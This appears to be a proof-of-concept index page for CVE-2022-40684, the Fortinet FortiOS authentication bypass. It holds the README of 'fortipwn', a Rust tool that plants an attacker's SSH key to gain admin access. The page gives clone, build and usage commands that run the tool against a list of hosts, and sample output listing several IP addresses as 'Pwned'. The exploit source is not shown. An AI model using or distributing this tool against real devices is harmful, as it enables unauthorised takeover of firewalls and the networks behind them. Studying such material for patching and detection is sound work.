CVE-2022-40684 PoC: Fortinet FortiOS Authorization Issue Vulnerability

Source
Associated Vulnerability
Title: Fortinet FortiOS Authorization Issue Vulnerability (CVE-2022-40684)
Description: An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Description
Forti CVE-2022-40684 enumeration script built in Rust
Readme
# fortipwn

Forti CVE-2022-40684 enumeration script built in Rust.

Uploads an SSH public key into authorized_keys, allowing an attacker to SSH into a server running FortiOS as admin.

# Usage
```console
$ ./fortipwn <hosts.txt> <id_rsa.pub>
```

# Build
```console
$ git clone https://github.com/Grapphy/fortipwn/
$ cd fortipwn
$ cargo build --release
$ cd target/release/
$ ./fortipwn <hosts.txt> <id_rsa.pub>
```

# Output
```console
$ ./fortipwn examples_ip.txt id_rsa.pub
Checking for 150 hosts. You might log-in through ssh as admin@host on pwned hosts.
Pwned: 210.29.110.143
Pwned: 144.14.71.122
Pwned: 21.220.10.82
Pwned: 163.123.102.32
Pwned: 121.159.192.10
Pwned: 162.49.194.19
Pwned: 185.92.20.40
Pwned: 194.19.211.19
Finished scanning
```
File Snapshot

```
[4.0K]  /data/pocs/51935e9c1e8d1c58251fc43c13dc3024cd376d29
├── [ 25K]  Cargo.lock
├── [ 395]  Cargo.toml
├── [ 750]  README.md
├── [4.0K]  src
│   ├── [1.1K]  cve.rs
│   ├── [  13]  lib.rs
│   └── [1.0K]  main.rs
└── [4.0K]  tests
    └── [ 867]  integration_test.rs

3 directories, 7 files
```